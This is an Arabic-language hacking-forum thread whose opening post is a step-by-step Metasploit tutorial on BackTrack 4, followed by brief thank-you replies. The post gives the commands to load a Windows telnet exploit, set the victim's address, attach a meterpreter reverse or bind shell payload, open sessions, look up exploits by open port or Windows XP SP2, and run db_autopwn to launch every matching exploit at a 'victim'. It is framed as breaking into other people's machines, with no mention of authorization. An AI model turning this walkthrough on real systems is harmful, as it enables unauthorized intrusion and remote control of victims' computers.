اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

ولأدواتهـ المهـمهـ بـ المـيتـآسبلويـت

ولأدواتهـ المهـمهـ بـ المـيتـآسبلويـت


النتائج 1 إلى 7 من 7

الموضوع: ولأدواتهـ المهـمهـ بـ المـيتـآسبلويـت

  1. #1
    هكر مبتديء Array
    تاريخ التسجيل
    Feb 2010
    المشاركات
    47

    افتراضي ولأدواتهـ المهـمهـ بـ المـيتـآسبلويـت



    السلآم عليـكم و رحمة اللهـ و بركـآتـة

    اول شـرح لـي بالمنظمـة ، اتمنى ان يفيـد الجميـع ,


    اخذت لـي لفهـ سريـعهـ بالقسـم و بصرآحـهـ المواضيـع اغلبها متقـآربه مـن بعـض و مشروحهـ بأكثـر من منتـدى ،،

    فأن شـآء الله راح اشرح لـو 50% عـن الميتـى سبلويت و ادواتهـ التـي يحتـآجهـآ الهـآكر

    و لو تلاحضون اني كتبت في الموضوع المستخدم العربي مـآ حبيـت اقول كراكر عربي ، لكـن الهكـر هو مـن لآ يجعـل آمــآمه شـي الا و يبحـث عن كـل مـآ يخصـه و يتقنهـ

    و المستخـدم العربـي مـآ يعرف بالميتـآ الا db_nmap , msfconsole , payload و ثغرات السمب المنقرضه

    و هذآ بصراحهـ شـي مخزي ، للعـلم ان مشروع الميتـآسبلويت من اقوى اول 10 مشاريع للهـآكرز ، و هو منتشر بكل المنتديـآت العربيـهـ بس للاسف القليل الي يهتـم لجميـع ادواتهـ

    فآنا ببدأ بشرح بعض الادوات و البـآقي عليكـم ،،

    اول ادآة و هـي msfconsole معروف ان الاداه هي الميتـآسبلويت و استغلال القغرات يكون عن طريقهـآ غـالباً

    قبل كـل شـي الشـرح بيكون على توزيعة backtrack4 fainl

    نبدأ بشرح اول اداه و هي msfconsie

    معروفهـ الاداه بشرحها كي يكمل الموضوع

    نذهب الى مسار الميتاسبلويت بالامر هذا

    cd /pentest/exploits/framework3



    ثم اكتب الامر هذا لتشغيل اداة الـmsfconsle


    ./msfconsole





    و تستطيع ان تدخل للأداه دون الذهاب للمسار بمجرد كتابت msfconsle بالترنمال



    الاداه فيها الادوات التـآليـهـ :
    exploits < الثغرات الي تسمح لنا بدخول نظام الضحيه
    payload < البايلود الملف الي بيتصل بجهاز الضحيه و لن تستطيع تطبيق اي ثغره الا بأستخدام الاداه
    auxiliary < فيها ادوات كثيره مثل الـفحـص و غيره لن اتطرق لها بالموضوع هذآ
    encoders < تستعمل للتشفير و لن اتطرق لها بهذا الموضوع ايضاً
    و هناك بعض الادوات ان شاء الله نشرحها مع الوقت

    بشرح الأداتين expliot and payload
    الي هي الاهم في الاختراق

    نبدأ بشرح الاداة exploit

    الاداه سهـلهـ جداً و ثغرآتهـآ لآ تحتاج الا للـip فقـط [غالباً] بعـض الثغرآت يختلف طريقة استغلآلهـآ

    و تأكد ان كل ثغره موجوده او كل exploit يحتاج الى بايلود

    لعرض الثغرات نطبق الامر هذا

    كود PHP:
    show exploits
    و لاستغلال ثغره معينهـ نطبق الامر

    كود PHP:
    use exploit/النظام المصاب / نوع الثغره / اسم الثغره /
    يعني لو بغيت تستغل مثلاً ثغرة التلنت تطبق الامر التالي

    كود PHP:
    use exploit/windows/telnet/gamsoft_telsrv_username
    نشوف اول شي كتبنا اكسبلويت ثم الونيدوز الي هو النظام المصاب و التلنت نوع الثغره ثم اسمها
    و التلنت له ثغرتين بالميتا

    الحين نطلع المتغيرات المطلوبه

    المتغيرات : هي الي تطلبها الثغره مثل اي بي الضحيه و البورت

    و تعرض المتغيرات بالامر هذا

    كود PHP:
    show options
    RHOST و هذي تعني اي بي الضحيه او الهوست
    RPORT و هذي تعني بورت الضحيه و الافضل انك تخليه مثل ماهو لان البرنامج المصاب عند الضحيه يكون متصل على البورت نفسه
    طيب نظيف اي بي الضحيه الى الثغره بالامر

    كود PHP:
    set RHOST 127.0.0.1


    طيب نشوف اذا طبقنا الثغره




    الحين طلعنا المتغيرات و اضفناها بالامر الي فوق ، و بصوره انا ما اضفته للحين

    طيب الحين باقي نظيف البايلود الي نبي نستخدمه للضحيه و البايلودات كثير و انا افظل البايلود meterpreter

    لاضافة البايلود بأتصال عكسي طبق الامر هذا [و الاتصال العكسي هو الافضل دائماً و يشترط تفتح بورت 4444]

    كود PHP:
    set PAYLOAD windows/meterpreter/reverse_tcp
    و اذا تبي يكون الاتصال من الضحيه نفسه اكتب الامر هذا

    كود PHP:
    set PAYLOAD windows/meterpreter/bind_tcp
    و البايلود هذا ما راح يطلب منك الاي بي تبعك ولا البورت

    بس الاول بيطلب منك الاي بي تبعك و البورت 4444 و هو موجود من اول
    طيب نظيف الاي بي تبعنا

    الي بيكون اسمه LHOST

    بالامر
    كود PHP:
    set LHOST 127.0.0.1
    طيب الحين نسوي استعراض لمتغيرات الثغره و نشوف كيف صارت




    و بعض الثغرات ما تقدر تسوي الاستغلال على النظام اوتماتيك فيطلب منك نظام الضحيه
    فعليك انك تختار النظام و قبل ان تختاره تستعرض الانظمه الي مصابه بالثغره [و احياناً يكون اصدار برنامج و ليس نظام ]

    طيب نكتب الامر
    كود PHP:
    show targets
    لعرض الانظمة المصابه

    وتجي الانظمة مرقمه كل نظام له رقم


    كود PHP:
    set TARGET 7
    و اخيراً نكتب الامر
    كود PHP:
    exploit
    ليتم استغلال الثغره ، و اذا تم استغلال الثغره بيعلمك ان فيه جلسه جديده و عشان تتاكد اكتب الامر التالي
    كود PHP:
    sessions
    ان طلع لك
    كود:
    Active sessions


    No active sessions.
    معناه ما استغلت الثغره و السبب هو ان النظام مرقع الثغره او غيره من الاسباب

    و ان تم الاتصال بيطلع لك رقم للجهاز فعشان تستغله تكتب الامر

    كود PHP:
    sessions -i 1
    فرقم 1 هو يعني رقم الجهاز فممكن تخترق انت اكثر من جهاز و تكون الاجهزه مرقمه

    طيب اوامر الـ meterpreter

    كثيره عشان تتحكم بجهاز الضحيه يمكنك ان تكتب help و تطلع لك الاوامر و جنب كل امر شرح له او تبحث عنها بقوقل

    الحيـن اتوقع ما عاد احتاج اشرح البايلود لانه صار مفهوم

    ننتقل من جو الاختراق الى البرامج المساعده في الميتى سبلويت الي ما شفت احد يشرحهاب المنتديات و هي مهمه لكـل مبتدئ بأختراق الانظمه ، تفيده كثير بمعرفة ثغرات الانظمه و تسهل عنه جهد كبير

    و الادوات هذي موجوده بالملف tools و نروح له بالامر التالي

    كود PHP:
    cd /pentest/exploits/framework3/tools/
    و نكتب الامر التالي كي نعرض الملفات الموجوده بالملف

    كود PHP:
    ls
    طيب راح اشرح بعض الملفات المهمه

    نبدأ باول اداة و هي module_ports.rb
    الاداة هذي تعلمنا بالثغرات الي يكون فيها البورت

    مثلاً ثغرت السمب بورتها 445 ، نقول فحصنا الضحيه و لقينا عنده البورت 21 ولا نعرف وش له هالبورت وش ثغرته عشان نعرف نستخدم الاداه module_ports.rb طيب طريقة استخدام الاداه بالامر هذا

    كود PHP:
    ruby module_ports.rb | grep "21"
    و بدل الرقم 21 تضع البورت المفتوح عند الضحيـه ، و ثمها تجد الثغرات الي فيها البورت

    ،،
    ،،

    الاداة الثانيه و هي module_targets.rb
    لمعرفة ثغرات النظام فمثلاً نظام الضحيهـ هو XP SP2 اكس بي سيرفس باك 2
    عشان نعرف ثغرات النظام هذا نطبق الامر التالي

    كود PHP:
    ruby module_targets.rb | grep "XP SP2"
    و بتطلع لنا ثغرات النظام ، او اهمها و اخطرها


    المطلوب هو انكم تعرفوا كيف تستعملو الادوات و جربوا جميع الادوات

    طيـب نرجع للمسفكونسل msfconsle لكن بطريقهـ غيـر

    و هي استعمال اداة db_autopwn

    و سبق و شرحتها بمنتدى امان العرب

    و هذي الاداه تسمح لنا باختراق النظام بدون تعب و تجرب عليه جميع ثغرات المنافذ المفتوحه بجهاز الضحيه

    لكن بشرحها هنا و الاداه هذي فيها مشكله واجهة الشعب كله و قالو حلها تعيد تركيبها و هذا مشوار

    لكن انا بستعملها بطريقه تختلف لحل المشكله

    نبدأ بالشرح

    اول شـيء نروح للمسفكونسل msfconsle و مشروحه فوق كيف تروح لـه

    طيب بعد ما نشغل msfconsle نكتب الامر هذا

    كود PHP:
    db_driver sqlite3
    و الحين نطبق الامر التالي كي نفتح مجلد يكون محفوظ فيه ips الضحايا لنك تقدر تطبق الاداه هذي على اكثر من جهاز او على نطاق معين

    كود PHP:
    db_create arhaby
    arhaby تعني اسم المجلد

    طيب الحين نفحص نظام الضحيه بالامر
    كود PHP:
    db_nmap 127.0.0.1
    حلو الحين باقي اخر خطوه كيف يتم استغلال الثغرات المفتوحه بجهاز الضحيهـ بالامر

    كود PHP:
    db_autopwn -x -p -e
    و بتشوف ان الاداه بتطبق ثغرات كثيره و بياخذ وقت على حسب البورتات المفتوحه بجهاز الضحيه و عدد الاجهزه الي بتطبق عليها

    و هذا شرح من اليوتييوب

    http://www.youtube.com/watch?v=QfloV0FbwG8






    عسى اني افدتكم بأول شرح لـي ، و الاهدأء الى

    نجوم المنتدى

    Cracker


    black.jaguar

    ASDELY-ScOrPiOn



  2. #2
    هكر متميز Array الصورة الرمزية Abdullhadi JC
    تاريخ التسجيل
    Jul 2009
    الدولة
    Underworld
    المشاركات
    1,069

    افتراضي رد: ولأدواتهـ المهـمهـ بـ المـيتـآسبلويـت

    مشكور يا غالي
    تقبل مروري المتواضع
    تحياتي لك...


  3. #3
    محظور Array
    تاريخ التسجيل
    Nov 2010
    المشاركات
    843

    افتراضي رد: ولأدواتهـ المهـمهـ بـ المـيتـآسبلويـت

    يعطيك العافيه عزيزي

    موضوع متميز



  4. #4
    محظور Array
    تاريخ التسجيل
    Sep 2010
    الدولة
    الجحيم
    المشاركات
    249

    افتراضي رد: ولأدواتهـ المهـمهـ بـ المـيتـآسبلويـت

    ..............8...8 8888888...8......... .........
    ............8888.888 88888.8888.......... ....
    ...........88888.888 8888.888888......... ...
    ...........888888888 8888888888.......... ..
    ..............888888 8888888888.......... ....
    ..................88 888888888........... ........
    .................... ..888888............ ............
    .................... ....##.............. ..8................. .
    .................... ....##.............. 8888................ ....
    .................... ...##........8...888 8888...8............ .
    .......#............ .##......8888.888888 88.8888........
    ......###.........## ......88888.8888888. 888888......
    .....#####.....##... ....8888888888888888 888......
    ....######...##..... ......88888888888888 8..........
    ......######.##..... ..........8888888888 ...............
    .........####.##.... ...#...........88888 ....................
    ...........#####.... ..###..........##... .................... .
    ..............###... #####.........##.... .......#............
    ................##.# ####..........##.... .....####.........
    ...............##.## ##.....#.....##..... .#######.......
    ..............##.### ......###..##....### #####.......
    ..............####.. .....####.##..###### ##..........
    .............##..... .....#####.#..###### ....... ........
    .............##..... ......#######....... ...............
    .............##..... ..........###......
    شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
    شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .


  5. #5
    هكر مجتهد Array الصورة الرمزية mr.kotch
    تاريخ التسجيل
    Jan 2011
    الدولة
    jordan
    المشاركات
    337

    افتراضي رد: ولأدواتهـ المهـمهـ بـ المـيتـآسبلويـت

    بارك الله فيك على هالشرح المميز


  6. #6
    هكر متميز Array الصورة الرمزية jok17
    تاريخ التسجيل
    Oct 2010
    الدولة
    Deep-Web
    المشاركات
    733

    افتراضي رد: ولأدواتهـ المهـمهـ بـ المـيتـآسبلويـت

    مشكور
    بارك الله فيك
    يعطيك العافيه عزيزي
    موضوع متميز
    تحياتي



  7. #7
    هكر متميز Array الصورة الرمزية samilakehal
    تاريخ التسجيل
    Nov 2011
    الدولة
    الحزائر
    المشاركات
    1,109

    افتراضي رد: ولأدواتهـ المهـمهـ بـ المـيتـآسبلويـت

    ثاااااااااااااااااااااااا ااااااااااانكس


وجد الزوار هذه الصفحة بالبحث عن:

مشكلة في الميتا No active sessions.

No active sessions.

ما معنى Active Sessions

تحميل الميتاسبلويت بجميع ادواته

no active sessions

no active session مشكلة

بعد استعراض الجلسة بالميتاسبلوت

Active Sessions معناه

شرح ruby: No Aljyyosh.rb )

ماذا تعني your active session

session not active مشكل

no active sessions مشكلة

مشكلة no active sessions.

No active session الميتا

ميتاسبلويت no active session

حل مشكلة ثغرة روبي xp

الاختراق No active sessions.

No active sessions.مشكلة

intext:aljyyosh.rb

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •